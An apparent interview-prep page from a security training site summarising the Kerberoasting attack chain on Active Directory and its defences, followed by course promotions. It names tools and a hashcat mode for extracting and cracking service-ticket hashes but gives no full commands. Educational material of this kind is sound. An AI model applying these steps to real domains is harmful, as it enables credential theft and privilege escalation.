Explain Kerberoasting attack with full chain.

Kerberoasting — extract service account password hashes from AD. Chain: (1) As any AD user, query domain for SPNs (Service Principal Names) — every service-using account has SPN. (2) Request Kerberos service ticket (TGS) for each SPN — TGS is encrypted with service account's NTLM hash. (3) Extract TGS using Rubeus or impacket-GetUserSPNs. (4) Crack offline with hashcat (-m 13100) using rockyou.txt or custom wordlists. (5) Service accounts often have weak/stale passwords + are admins → recover password → privilege escalation. Defence: long random service account passwords (24+ chars), Group Managed Service Accounts (gMSA), AES-only Kerberos.

Want the full explanation? This is the atomic answer suitable for quick interview prep. For the structured deep-dive — including code samples, strong-answer vs weak-answer notes, common follow-up questions, and how this fits the larger ethical hacking topic — see the full Q&A on Networkers Home:

→ Ethical Hacking Interview Hub — Full Q&A with deep context

How Networkers Home prepares students for this kind of question

This question reflects real interview rounds at Bangalore's top product, BFSI, and GCC cybersecurity teams. Networkers Home's flagship courses include mock interview sessions drilling exactly these question patterns, with feedback from interviewers who have hired for the role.

→ View the complete ethical hacking interview prep hub
→ View the related Networkers Home course
→ Book a free career consultation

Explain Kerberoasting attack with full chain.

How Networkers Home prepares students for this kind of question

Related Active Directory questions

Q. What is BloodHound and how do you use it in AD pen-test?

Q. Explain Pass-the-Hash, Pass-the-Ticket, and Pass-the-Key.